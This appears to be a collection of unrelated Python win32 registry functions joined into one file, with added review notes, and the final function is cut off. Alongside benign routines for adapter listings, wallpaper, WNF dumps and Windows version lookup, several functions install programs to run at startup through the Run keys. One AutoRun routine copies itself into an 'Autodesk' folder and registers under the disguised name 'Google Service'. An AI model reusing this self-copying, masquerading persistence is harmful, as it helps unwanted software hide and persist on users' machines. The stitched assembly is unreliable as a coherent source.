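def win32_get_adapter_list():
    """Return ``(connection name, driver component id)`` for each network adapter.

    Two HKLM subtrees are read and joined on the adapter instance GUID: the
    network device class key (``ComponentId`` and ``NetCfgInstanceId`` of each
    subkey) and the network connections key (the ``Name`` value under each
    GUID-named entry's ``Connection`` subkey).

    Returns:
        A list of ``(name, component_id)`` tuples. Connections whose GUID has
        no entry in the class key are left out.

    Raises:
        Whatever ``win32api`` raises when a key or value cannot be opened or
        read; nothing is swallowed here.
    """
    from win32api import RegCloseKey, RegEnumKeyEx, RegOpenKeyEx
    from win32api import RegQueryValueEx
    from win32con import HKEY_LOCAL_MACHINE

    NET_GUID = "{4D36E972-E325-11CE-BFC1-08002BE10318}"
    CONTROL_PATH = "SYSTEM\\CurrentControlSet\\Control\\"
    ADAPTER_KEY = CONTROL_PATH + "Class\\" + NET_GUID
    NETWORK_CONNECTIONS_KEY = CONTROL_PATH + "Network\\" + NET_GUID

    # Pass 1: instance GUID -> driver component id.
    adapter_types = {}
    class_key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, ADAPTER_KEY)
    try:
        for entry in RegEnumKeyEx(class_key):
            subpath = "\\".join([ADAPTER_KEY, entry[0]])
            subkey = RegOpenKeyEx(HKEY_LOCAL_MACHINE, subpath)
            try:
                drivername = RegQueryValueEx(subkey, "ComponentId")
                instanceid = RegQueryValueEx(subkey, "NetCfgInstanceId")
            finally:
                # Release the handle even when a value is missing.
                RegCloseKey(subkey)
            adapter_types[instanceid[0]] = drivername[0]
    finally:
        RegCloseKey(class_key)

    # Pass 2: instance GUID -> friendly connection name, joined with pass 1.
    adapters = []
    connections_key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, NETWORK_CONNECTIONS_KEY)
    try:
        for entry in RegEnumKeyEx(connections_key):
            guid = entry[0]
            # Only GUID-named subkeys describe connections.
            if not guid.startswith('{'):
                continue
            subpath = "\\".join([NETWORK_CONNECTIONS_KEY, guid, "Connection"])
            subkey = RegOpenKeyEx(HKEY_LOCAL_MACHINE, subpath)
            try:
                name = RegQueryValueEx(subkey, "Name")
            finally:
                RegCloseKey(subkey)
            if guid in adapter_types:
                adapters.append((name[0], adapter_types[guid]))
    finally:
        RegCloseKey(connections_key)
    return adapters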
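def _read_hklm_reg(key_name, value_name):
    """Read one HKLM value from the 32-bit and the 64-bit registry view.

    On 64-bit Windows the two views can hold different data for the same key
    path, so code that inventories or audits installed software needs both.

    Args:
        key_name: Subkey path below HKEY_LOCAL_MACHINE.
        value_name: Name of the value to read.

    Returns:
        ``(value32, value64)``. A view that cannot be read yields ``''``.
        When ``_is_64bit_windows()`` is false the key is opened without a view
        flag and ``value64`` is always ``''``.
    """
    from win32api import RegOpenKeyEx, RegQueryValueEx, RegCloseKey
    from win32con import HKEY_LOCAL_MACHINE, KEY_READ

    KEY_WOW64_64KEY = 0x0100
    KEY_WOW64_32KEY = 0x0200

    def _query(view_flag):
        # Any failure (missing key, missing value, access denied) maps to ''.
        # The handle is closed on every path once it has been opened.
        try:
            key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, key_name, 0,
                               KEY_READ | view_flag)
            try:
                value, _ = RegQueryValueEx(key, value_name)
            finally:
                RegCloseKey(key)
        except Exception:
            return ''
        return value

    if _is_64bit_windows():
        return (_query(KEY_WOW64_32KEY), _query(KEY_WOW64_64KEY))
    return (_query(0), '')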
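def __set_wallpaper_from_bmp(self, bmp_path):
    """Set the current user's desktop wallpaper to the image at ``bmp_path``.

    Writes the wallpaper layout values under HKCU ``Control Panel\\\\Desktop``
    and then asks the shell to apply the image.

    Args:
        bmp_path: Path of the image handed to ``SystemParametersInfo``.
    """
    reg_key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0,
                           KEY_SET_VALUE)
    try:
        RegSetValueEx(reg_key, "WallpaperStyle", 0, REG_SZ, "2")
        # The value Windows reads is named "TileWallpaper"; any other spelling
        # only creates an unused value.
        RegSetValueEx(reg_key, "TileWallpaper", 0, REG_SZ, "0")
    finally:
        # Close the handle even if one of the writes fails.
        reg_key.Close()
    SystemParametersInfo(SPI_SETDESKWALLPAPER, bmp_path,
                         SPIF_SENDWININICHANGE)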
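def DumpKeyInfo(StateName, ShowSd, ShowData):
    """Print the table row for a single WNF state name.

    ``StateName`` is parsed as a hexadecimal string and XOR-ed with
    ``WNF_STATE_KEY`` to obtain the internal name. Unless the name's lifetime
    field is ``WnfTemporaryStateName``, the matching key from
    ``g_LifetimeKeyNames`` is opened read-only under HKLM and the value stored
    under ``StateName`` is read from it.

    Args:
        StateName: State name as a hexadecimal string.
        ShowSd: Forwarded unchanged to ``DumpWnfData``.
        ShowData: Forwarded unchanged to ``DumpWnfData``.

    Returns:
        ``False`` when the lifetime key cannot be opened or holds no value for
        the name, ``True`` otherwise.
    """
    reghandle = None
    internalName = WNF_STATE_NAME_INTERNAL()
    internalName.value = int(StateName, 16) ^ WNF_STATE_KEY
    value = None

    try:
        if internalName.b.NameLifetime != WNF_STATE_NAME_LIFETIME[
                'WnfTemporaryStateName'].value:
            try:
                reghandle = RegOpenKeyEx(
                    HKEY_LOCAL_MACHINE,
                    g_LifetimeKeyNames[internalName.b.NameLifetime], 0,
                    KEY_READ)
            except Exception:
                print("[Error] Could not open root key: {}".format(
                    g_LifetimeKeyNames[internalName.b.NameLifetime]))
                return False

            try:
                value, _ = RegQueryValueEx(reghandle, StateName)
            except error:
                print("[Error] Could not find the WnfName in the registry")
                return False

        print(
            "\n| WNF State Name "
            "| S | L | P | AC | N | CurSize | MaxSize | Changes |")
        print("-" * 118)

        DumpWnfData(int(StateName, 16), value, ShowSd, ShowData)
    finally:
        # Runs on the early "return False" paths too, so the handle is
        # released no matter how the function exits.
        if reghandle is not None:
            RegCloseKey(reghandle)
    return True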
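def DumpWnfNames(ShowSd, ShowData):
    """Print one table per WNF lifetime key, one row per registered state name.

    Each key in ``g_LifetimeKeyNames`` is opened read-only under HKLM and its
    values are enumerated. Value names that are not hexadecimal are skipped.

    Args:
        ShowSd: Forwarded unchanged to ``DumpWnfData``.
        ShowData: Forwarded unchanged to ``DumpWnfData``.

    Returns:
        ``False`` as soon as a lifetime key cannot be opened or ``DumpWnfData``
        reports failure, ``True`` after all keys have been dumped.
    """
    for lifetime, key_name in enumerate(g_LifetimeKeyNames):
        try:
            reghandle = RegOpenKeyEx(HKEY_LOCAL_MACHINE, key_name, 0, KEY_READ)
        except Exception:
            print("[Error] Could not open root key: {}".format(key_name))
            return False

        try:
            print(
                "\n| WNF State Name [{:<10} Lifetime] "
                "| S | L | P | AC | N | CurSize | MaxSize | Changes |".format(
                    WnfLifetimeStrings[lifetime]))
            print("-" * 118)

            # Separate counter for the value enumeration so it cannot be
            # confused with the lifetime index of the outer loop.
            index = 0
            while True:
                try:
                    name, value, _ = RegEnumValue(reghandle, index)
                except error:
                    # Enumeration past the last value ends the table.
                    break
                index += 1
                try:
                    StateName = int(name, 16)
                except (TypeError, ValueError):
                    continue
                if not DumpWnfData(StateName, value, ShowSd, ShowData):
                    print("[Error] Something went wrong")
                    return False
        finally:
            # Also reached on the early "return False" above.
            RegCloseKey(reghandle)
    return True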
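def run_at_startup_set(appname, path):
    """
    Register ``path`` to run at startup under the value name ``appname``.

    The value is written as REG_SZ to ``SUBKEY`` under HKEY_LOCAL_MACHINE.
    ``SUBKEY`` is defined elsewhere in the file (presumably the machine-wide
    Run key; confirm). Opening an HKLM key for writing normally requires an
    elevated process, and the failure is raised to the caller.

    Args:
        appname: Name of the registry value to create or overwrite.
        path: Command line stored in the value. It is written as given, so the
            caller should pass a quoted absolute path to a location that
            standard users cannot modify.
    """
    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
    try:
        RegSetValueEx(key, appname, 0, REG_SZ, path)
    finally:
        # Release the handle even when the write fails.
        RegCloseKey(key)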
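def run_at_startup_remove(appname):
    """
    Delete the run-at-startup registry value named ``appname``.

    The value is removed from ``SUBKEY`` under HKEY_LOCAL_MACHINE (``SUBKEY``
    is defined elsewhere in the file). Errors from opening the key or deleting
    the value, including a value that does not exist, are raised to the
    caller.

    Args:
        appname: Name of the registry value to delete.
    """
    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
    try:
        RegDeleteValue(key, appname)
    finally:
        # Release the handle even when the delete fails.
        RegCloseKey(key)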
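def try_author():
    """Report whether this process can open the machine-wide Run key for writing.

    The key is opened with KEY_SET_VALUE and closed again at once; nothing is
    written. In practice this serves as a check for sufficient privileges
    before an autostart entry is changed.

    Returns:
        ``True`` if the key could be opened and closed, ``False`` on any error.
    """
    try:
        key = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                           "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
                           0, KEY_SET_VALUE)
        RegCloseKey(key)
    except Exception:
        # Exception rather than a bare except, so KeyboardInterrupt and
        # SystemExit are not reported as "no access".
        return False
    return True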
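def run_at_startup_set(app_name, path):
    """
    Register ``path`` to run at startup under the value name ``app_name``.

    Writes a REG_SZ value to ``SUBKEY`` under HKEY_LOCAL_MACHINE (``SUBKEY`` is
    defined elsewhere in the file) and prints "Key set" once the write has
    succeeded. Opening an HKLM key for writing normally requires an elevated
    process; the failure is raised to the caller.

    Args:
        app_name: Name of the registry value to create or overwrite.
        path: Command line stored in the value, written exactly as given.
            Callers should pass a quoted absolute path.
    """
    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
    try:
        RegSetValueEx(key, app_name, 0, REG_SZ, path)
    finally:
        # Release the handle even when the write fails.
        RegCloseKey(key)
    print("Key set")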
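def main():
    """Apply ``cache/cache.jpg`` as the current user's desktop wallpaper.

    Sets ``WallpaperStyle`` and ``TileWallpaper`` to "0" under HKCU
    ``Control Panel\\\\Desktop`` and then asks the shell to load the image. The
    image path is resolved against the current working directory.
    """
    # Open the desktop settings key of the current user for writing.
    regkey = RegOpenKeyEx(HKEY_CURRENT_USER, 'Control Panel\\Desktop', 0,
                          KEY_SET_VALUE)
    try:
        RegSetValueEx(regkey, 'WallpaperStyle', 0, REG_SZ, '0')
        RegSetValueEx(regkey, 'TileWallpaper', 0, REG_SZ, '0')
    finally:
        # Close the handle even if one of the writes fails.
        regkey.Close()
    # Tell the shell to reload the wallpaper.
    SystemParametersInfo(SPI_SETDESKWALLPAPER,
                         os.path.abspath('cache/cache.jpg'),
                         SPIF_SENDWININICHANGE)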
def Reg_Edit():
    """Write three fixed autostart entries to the machine-wide Run key.

    Every value is a quoted path below ``C:\\\\Program Files``. Commands stored
    in this key are started at logon for every user of the machine, which is
    why changes to it are a standard item in persistence monitoring.
    """
    run_key_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    # NOTE(review): KEY_ALL_ACCESS already contains the read and write rights
    # OR-ed in after it; only the right to set values is used below.
    access_mask = (win32con.KEY_ALL_ACCESS | win32con.KEY_WRITE
                   | win32con.KEY_READ)
    entries = (
        ("FtpServer", "\"C:\\Program Files\\FtpServer.exe\""),
        ("QQClient", "\"C:\\Program Files\\QQClient.exe\""),
        # NOTE(review): the value name "360sd" does not match the binary it
        # starts (QQClient.exe). A name/target mismatch in a Run entry is
        # worth flagging during triage.
        ("360sd", "\"C:\\Program Files\\QQClient.exe\""),
    )
    key = RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, run_key_path, 0,
                       access_mask)
    for value_name, command in entries:
        RegSetValueEx(key, value_name, 0, win32con.REG_SZ, command)
    RegCloseKey(key)
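def auto_start(what, path):
    """Enable or disable the ``MY_WINDMILL`` autostart entry.

    The entry lives in the machine-wide Run key, so the call only succeeds in
    a process that is allowed to write to HKLM.

    Args:
        what: Truthy to write the entry, falsy to delete it.
        path: Executable path. It is stored wrapped in double quotes and
            followed by ``/start``. Unused when deleting.

    Returns:
        ``True`` on success, ``False`` if the key could not be opened or the
        write or delete failed.
    """
    try:
        key = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                           "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
                           0, KEY_SET_VALUE)
        try:
            if what:
                RegSetValueEx(key, 'MY_WINDMILL', 0, REG_SZ,
                              '"%s" /start' % path)
            else:
                RegDeleteValue(key, 'MY_WINDMILL')
        finally:
            # Release the handle on the failure path as well.
            RegCloseKey(key)
        return True
    except Exception:
        return False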
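def set_wall(path=None):
    """Set the current user's desktop wallpaper.

    Args:
        path: Image to apply. When empty or ``None`` the bundled
            ``image/wall.jpg`` next to this module is used.

    Never raises: any failure is passed to ``dump_log`` instead.
    """
    try:
        key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0,
                           KEY_SET_VALUE)
        try:
            RegSetValueEx(key, 'WallpaperStyle', 0, REG_SZ, '2')
            RegSetValueEx(key, 'TileWallpaper', 0, REG_SZ, '0')
            if not path:
                path = dirname(__file__) + '/image/wall.jpg'
            # 1 + 2: presumably SPIF_UPDATEINIFILE | SPIF_SENDCHANGE; confirm
            # against the constants the file imports.
            SystemParametersInfo(SPI_SETDESKWALLPAPER, path, 1 + 2)
        finally:
            # Release the handle even when a write or the shell call fails.
            RegCloseKey(key)
    except BaseException as e:
        # NOTE(review): BaseException also covers KeyboardInterrupt and
        # SystemExit; kept because callers may rely on "never raises".
        dump_log('设置壁纸' + '--->' + str(e))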
def __init__(self, key, sub_key, flag):
    """ Constructor : open a registry key as a file-like object.

    The default (unnamed) value of the key is used as the file content and is
    buffered in a StringIO object.

    key     : HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE,
              HKEY_USERS
    sub_key : The name of a key that this method opens
    flag    : "r" for read
              "w" for write
              "a" for append
              "b" for binary

    Raises FileNotFoundError(key, sub_key) in read mode when the key cannot
    be opened or its default value cannot be read. In the other modes the key
    is created instead.
    """
    from win32api import RegQueryValueEx, RegCreateKey, RegOpenKeyEx
    from win32con import KEY_ALL_ACCESS
    from StringIO import StringIO

    # Save the file information
    self.key = key
    self.sub_key = sub_key

    # Initialization of internal data
    self.deleted = 0
    self.handle = None
    self.data = None

    # Check mode (presumably sets self.flag, which is read below; verify)
    self.__checkMode(flag)

    # Create an empty file
    self.data = StringIO()

    try:
        # Open registry key
        # NOTE(review): KEY_ALL_ACCESS is requested even in read mode, so a
        # caller that may only read the key cannot open it.
        self.handle = RegOpenKeyEx(key, sub_key, 0, KEY_ALL_ACCESS)

        # Read key content (the unnamed default value)
        data = RegQueryValueEx(self.handle, "")[0]

        # If the file is in read mode
        if self.flag == self.READ:
            # Read data
            self.data = StringIO(data)
        # If the file is in append mode
        elif self.flag == self.APPEND:
            self.data.write(data)
    except:
        # NOTE(review): the bare except treats every failure as "key not
        # found", including access-denied errors.
        # If the file must be read
        if self.flag == self.READ:
            # The file is not found
            raise FileNotFoundError(key, sub_key)
        else:
            # Create a new registry key
            self.handle = RegCreateKey(key, sub_key)
def StartYardServer(self):
    # Start the Y.A.R.D server executable whose path is stored in the current
    # user's registry hive.
    #
    # Raises self.Exception when the registry entry is missing or names a
    # file that does not exist, and eg.Exception when the process cannot be
    # created.
    try:
        # NOTE(review): the path comes from HKCU, which the logged-on user can
        # write without elevation. Whatever that value names is executed with
        # this process's privileges, so this matters if the host runs
        # elevated.
        rkey = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Webers\\Y.A.R.D")
        path = RegQueryValueEx(rkey, "program")[0]
        if not os.path.exists(path):
            raise Exception
    except:
        # Every failure above is reported as "not configured".
        raise self.Exception(
            "Please start Yards.exe first and configure it.")
    try:
        # NOTE(review): path is passed as the second argument with the first
        # set to None. Assuming this is win32process.CreateProcess, it is
        # parsed as a command line, so a path with spaces should be quoted.
        # The returned handle is stored in hProcess but not used afterwards.
        hProcess = CreateProcess(None, path, None, None, 0,
                                 CREATE_NEW_CONSOLE, None, None,
                                 STARTUPINFO())[0]
    except Exception, exc:
        raise eg.Exception(FormatError(exc[0]))
def launchAtStart():
    """Copy the running program to ``dirProgram`` and register it to run at startup.

    ``dirProgram``, ``appName`` and ``pathProgram`` are defined elsewhere in
    the file. Returns 1 after the copy and the registry write, otherwise 0.

    NOTE(review): the indentation of this listing was lost. The layout below
    assumes the whole installation runs only when ``dirProgram`` did not exist
    yet, which is the only reading in which ``return 0`` is reachable. Confirm
    against the original file.

    A new directory and file followed by a write to the machine-wide Run key
    is the sequence that endpoint monitoring looks for as an installation
    footprint (MITRE ATT&CK T1547.001).
    """
    #first of all we have to check if the path that we want exists
    if not os.path.exists(dirProgram):
        os.makedirs(dirProgram)
        #copy the program to the new folder
        shutil.copy(sys.argv[0], dirProgram)
        #create the registry key
        # GetModuleFileName and RegDeleteValue are imported but not used here.
        from win32api import (GetModuleFileName, RegCloseKey, RegDeleteValue,
                              RegOpenKeyEx, RegSetValueEx)
        from win32con import HKEY_LOCAL_MACHINE, KEY_WRITE, REG_SZ
        SUBKEY = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
        # Writing below HKLM needs an elevated process; a failure raises here.
        key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
        # flag receives the return value of RegSetValueEx and is not read again.
        flag = RegSetValueEx(key, appName, 0, REG_SZ, pathProgram)
        RegCloseKey(key)
        return 1
    return 0
def AutoRun():
    """Copy the built executable to a fixed folder and add a per-user Run entry.

    What the code shows, for triage:
      * the destination is an ``Autodesk`` folder under the local
        ``Administrator`` profile, and the Run value is named
        ``Google Service``. Neither name is derived from the program itself,
        which is the pattern classified as masquerading (MITRE ATT&CK T1036);
      * the entry goes to HKCU ``Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run``,
        which needs no elevation (T1547.001);
      * all errors are printed or swallowed, so the routine never raises.
    """
    # Copy this program and register it to run automatically at startup
    alwaysFileName = path.basename(__file__)
    alwaysFileName = alwaysFileName.split('.')[0]
    nowPyPath = path.abspath(path.dirname(__file__))
    nowExeName = path.abspath(
        path.dirname(__file__)) + '\\' + alwaysFileName + '.exe'
    newExeFilePath = 'C:\\Users\\Administrator\\AppData\\Local\\Autodesk\\' + \
        alwaysFileName + '.exe'
    # After being built into an exe the name still ends in .py, so ".exe" is
    # appended by hand
    if nowPyPath != 'C:\\Users\\Administrator\\AppData\\Local\\Autodesk\\':
        # If the file is not already in the Autodesk location
        # NOTE(review): abspath() output has no trailing separator, so this
        # comparison does not match the literal and the copy is attempted on
        # every run, a repeated file write that monitoring can key on.
        try:
            copyfile(nowExeName, newExeFilePath)  # Copy the file to the target directory
            print('复制成功')
        except Exception as e:
            print(e)
    KeyName = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'  # Registry key name
    keyEnum = RegOpenKeyEx(
        HKEY_CURRENT_USER,
        'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0,
        KEY_ALL_ACCESS)
    ifValueExist = False
    try:
        # Check whether the value that is about to be written already exists.
        # The loop ends when RegEnumValue raises past the last value.
        i = 0
        while True:
            regValue = RegEnumValue(keyEnum, i)
            if regValue[0] == 'Google Service':
                ifValueExist = True
                print('键值已存在')
            i += 1
    except:
        pass
    if not ifValueExist:
        try:
            key = RegOpenKey(HKEY_CURRENT_USER, KeyName, 0, KEY_ALL_ACCESS)
            RegSetValueEx(key, 'Google Service', 0, REG_SZ, newExeFilePath)
            RegCloseKey(key)
            print('添加成功!')
        except Exception as e:
            print(e)
def win32_ver(release='', version='', csd='', ptype=''):
    """ Look up Windows version details through the win32 extensions.

        Returns the tuple (release, version, csd, ptype): release name,
        version number, CSD (service pack) level and OS type. The arguments
        are the defaults handed back for anything that cannot be determined.

        ptype is read from the registry value 'CurrentType', for example
        'Uniprocessor Free' or 'Multiprocessor Free'. 'Free' means a build
        without debugging code, 'Checked' a build with it.

        Without Mark Hammond's win32 package the arguments are returned
        unchanged. The values are descriptive and come partly from the
        registry; do not base security decisions on them.

    """
    # Without the win32 extensions there is nothing to query.
    try:
        import win32api
    except ImportError:
        return release, version, csd, ptype
    from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx
    from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT,\
        VER_PLATFORM_WIN32_WINDOWS

    # General version information from the API
    major, minor, build_no, platform_id, csd = GetVersionEx()
    version = '%i.%i.%i' % (major, minor, build_no & 0xFFFF)
    if csd.startswith('Service Pack '):
        csd = 'SP' + csd[13:]

    # Pick the registry key for the platform and guess the release name
    if platform_id == VER_PLATFORM_WIN32_WINDOWS:
        regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
        if major == 4:
            release = '95' if minor == 0 else '98'
        elif major == 5:
            release = '2000'
    elif platform_id == VER_PLATFORM_WIN32_NT:
        regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
        if major <= 4:
            release = 'NT'
        elif major == 5:
            release = '2000'
    else:
        # E.g. Win3.1 with win32s: no registry key to consult
        if not release:
            release = '%i.%i' % (major, minor)
        return release, version, csd, ptype

    # Open the key and read one value to make sure it really exists
    try:
        cur_ver_key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
        RegQueryValueEx(cur_ver_key, 'SystemRoot')
    except:
        return release, version, csd, ptype

    # Build number and processor type come from the registry
    build = _win32_getvalue(cur_ver_key, 'CurrentBuildNumber', ('', 1))[0]
    ptype = _win32_getvalue(cur_ver_key, 'CurrentType', (ptype, 1))[0]

    version = _norm_version(version, build)

    RegCloseKey(cur_ver_key)
    return release, version, csd, ptype
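def win32_ver(release='', version='', csd='', ptype=''):
    """ Get additional version information from the Windows Registry
        and return a tuple (release, version, csd, ptype) referring to
        release name, version number, CSD level and OS type
        (multi/single processor).

        As a hint: ptype returns 'Uniprocessor Free' on single
        processor NT machines and 'Multiprocessor Free' on multi
        processor machines. The 'Free' refers to the OS version being
        free of debugging code. It could also state 'Checked' which
        means the OS version uses debugging code, i.e. code that
        checks arguments, ranges, etc. (Thomas Heller).

        Note: this function works best with Mark Hammond's win32
        package installed, but also on Python 2.3 and later. It
        obviously only runs on Win32 compatible platforms. Where neither
        source is available the arguments are returned unchanged.

        The values are descriptive and partly read from the registry;
        do not base security decisions on them.

    """
    # XXX Is there any way to find out the processor type on WinXX ?
    # XXX Is win32 available on Windows CE ?
    #
    # Adapted from code posted by Karl Putland to comp.lang.python.
    #
    # The mappings between reg. values and release names can be found
    # here: http://msdn.microsoft.com/library/en-us/sysinfo/base/osversioninfo_str.asp

    # Import the needed APIs
    try:
        import win32api
        from win32api import RegQueryValueEx, RegOpenKeyEx, \
            RegCloseKey, GetVersionEx
        from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, \
            VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION
    except ImportError:
        # Emulate the win32api module using Python APIs
        try:
            sys.getwindowsversion
        except AttributeError:
            # No emulation possible, so return the defaults...
            return release, version, csd, ptype
        else:
            # Emulation using winreg (added in Python 2.0) and
            # sys.getwindowsversion() (added in Python 2.3)
            import winreg
            GetVersionEx = sys.getwindowsversion
            RegQueryValueEx = winreg.QueryValueEx
            RegOpenKeyEx = winreg.OpenKeyEx
            RegCloseKey = winreg.CloseKey
            HKEY_LOCAL_MACHINE = winreg.HKEY_LOCAL_MACHINE
            VER_PLATFORM_WIN32_WINDOWS = 1
            VER_PLATFORM_WIN32_NT = 2
            VER_NT_WORKSTATION = 1

    # Needed by the major-version-6 branch on both import paths. The win32con
    # import above does not supply them, so they are defined unconditionally.
    VER_NT_SERVER = 3
    REG_SZ = 1

    # Find out the registry key and some general version infos
    winver = GetVersionEx()
    major, minor, buildno, plat, csd = winver
    version = '%i.%i.%i' % (major, minor, buildno & 0xFFFF)
    if hasattr(winver, "service_pack"):
        if winver.service_pack != "":
            csd = 'SP%s' % winver.service_pack_major
    else:
        if csd[:13] == 'Service Pack ':
            csd = 'SP' + csd[13:]

    if plat == VER_PLATFORM_WIN32_WINDOWS:
        regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
        # Try to guess the release name
        if major == 4:
            if minor == 0:
                release = '95'
            elif minor == 10:
                release = '98'
            elif minor == 90:
                release = 'Me'
            else:
                release = 'postMe'
        elif major == 5:
            release = '2000'

    elif plat == VER_PLATFORM_WIN32_NT:
        regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
        if major <= 4:
            release = 'NT'
        elif major == 5:
            if minor == 0:
                release = '2000'
            elif minor == 1:
                release = 'XP'
            elif minor == 2:
                release = '2003Server'
            else:
                release = 'post2003'
        elif major == 6:
            if hasattr(winver, "product_type"):
                product_type = winver.product_type
            else:
                product_type = VER_NT_WORKSTATION
                # Without an OSVERSIONINFOEX capable sys.getwindowsversion(),
                # or help from the registry, we cannot properly identify
                # non-workstation versions.
                try:
                    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
                    try:
                        name, value_type = RegQueryValueEx(key, "ProductName")
                    finally:
                        # Do not leave the probe handle open.
                        RegCloseKey(key)
                    # Discard any type that isn't REG_SZ
                    if value_type == REG_SZ and name.find("Server") != -1:
                        product_type = VER_NT_SERVER
                except WindowsError:
                    # Use default of VER_NT_WORKSTATION
                    pass

            if minor == 0:
                if product_type == VER_NT_WORKSTATION:
                    release = 'Vista'
                else:
                    release = '2008Server'
            elif minor == 1:
                if product_type == VER_NT_WORKSTATION:
                    release = '7'
                else:
                    release = '2008ServerR2'
            else:
                release = 'post2008Server'

    else:
        if not release:
            # E.g. Win3.1 with win32s
            release = '%i.%i' % (major, minor)
        return release, version, csd, ptype

    # Open the registry key
    try:
        keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
        # Get a value to make sure the key exists...
        RegQueryValueEx(keyCurVer, 'SystemRoot')
    except Exception:
        return release, version, csd, ptype

    # Parse values
    build = _win32_getvalue(keyCurVer,
                            'CurrentBuildNumber',
                            ('', 1))[0]
    ptype = _win32_getvalue(keyCurVer,
                            'CurrentType',
                            (ptype, 1))[0]

    # Normalize version
    version = _norm_version(version, build)

    # Close key
    RegCloseKey(keyCurVer)
    return release, version, csd, ptype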
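def win32_ver(release='', version='', csd='', ptype=''):
    """ Get additional version information from the Windows Registry
        and return a tuple (release, version, csd, ptype) referring to
        release name, version number, CSD level and OS type
        (multi/single processor).

        As a hint: ptype returns 'Uniprocessor Free' on single
        processor NT machines and 'Multiprocessor Free' on multi
        processor machines. The 'Free' refers to the OS version being
        free of debugging code. It could also state 'Checked' which
        means the OS version uses debugging code, i.e. code that
        checks arguments, ranges, etc. (Thomas Heller).

        Note: this function works best with Mark Hammond's win32
        package installed, but also on Python 2.3 and later. It
        obviously only runs on Win32 compatible platforms. Where neither
        source is available the arguments are returned unchanged.

        The values are descriptive and partly read from the registry;
        do not base security decisions on them.

    """
    try:
        import win32api
        from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx
        from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION
    except ImportError:
        # Fall back to sys.getwindowsversion() and _winreg when possible.
        try:
            sys.getwindowsversion
        except AttributeError:
            return (release, version, csd, ptype)

        import _winreg
        GetVersionEx = sys.getwindowsversion
        RegQueryValueEx = _winreg.QueryValueEx
        RegOpenKeyEx = _winreg.OpenKeyEx
        RegCloseKey = _winreg.CloseKey
        HKEY_LOCAL_MACHINE = _winreg.HKEY_LOCAL_MACHINE
        VER_PLATFORM_WIN32_WINDOWS = 1
        VER_PLATFORM_WIN32_NT = 2
        VER_NT_WORKSTATION = 1

    # Used by the major-version-6 branch whichever import path was taken. The
    # win32con import does not provide them, so define them for both.
    VER_NT_SERVER = 3
    REG_SZ = 1

    winver = GetVersionEx()
    major, minor, buildno, plat, csd = winver
    version = '%i.%i.%i' % (major, minor, buildno & 65535)
    if hasattr(winver, 'service_pack'):
        if winver.service_pack != '':
            csd = 'SP%s' % winver.service_pack_major
    elif csd[:13] == 'Service Pack ':
        csd = 'SP' + csd[13:]

    if plat == VER_PLATFORM_WIN32_WINDOWS:
        regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
        if major == 4:
            release = {0: '95', 10: '98', 90: 'Me'}.get(minor, 'postMe')
        elif major == 5:
            release = '2000'
    elif plat == VER_PLATFORM_WIN32_NT:
        regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
        if major <= 4:
            release = 'NT'
        elif major == 5:
            release = {0: '2000', 1: 'XP', 2: '2003Server'}.get(
                minor, 'post2003')
        elif major == 6:
            if hasattr(winver, 'product_type'):
                product_type = winver.product_type
            else:
                # No product type from the API: let the registry's
                # ProductName decide between workstation and server.
                product_type = VER_NT_WORKSTATION
                try:
                    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
                    try:
                        name, value_type = RegQueryValueEx(key, 'ProductName')
                    finally:
                        # Do not leave the probe handle open.
                        RegCloseKey(key)
                    if value_type == REG_SZ and name.find('Server') != -1:
                        product_type = VER_NT_SERVER
                except WindowsError:
                    pass

            is_workstation = product_type == VER_NT_WORKSTATION
            if minor == 0:
                release = 'Vista' if is_workstation else '2008Server'
            elif minor == 1:
                release = '7' if is_workstation else '2008ServerR2'
            else:
                release = 'post2008Server'
    else:
        if not release:
            release = '%i.%i' % (major, minor)
        return (release, version, csd, ptype)

    # Open the key and read one value to make sure it exists.
    try:
        keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
        RegQueryValueEx(keyCurVer, 'SystemRoot')
    except Exception:
        return (release, version, csd, ptype)

    build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0]
    ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0]
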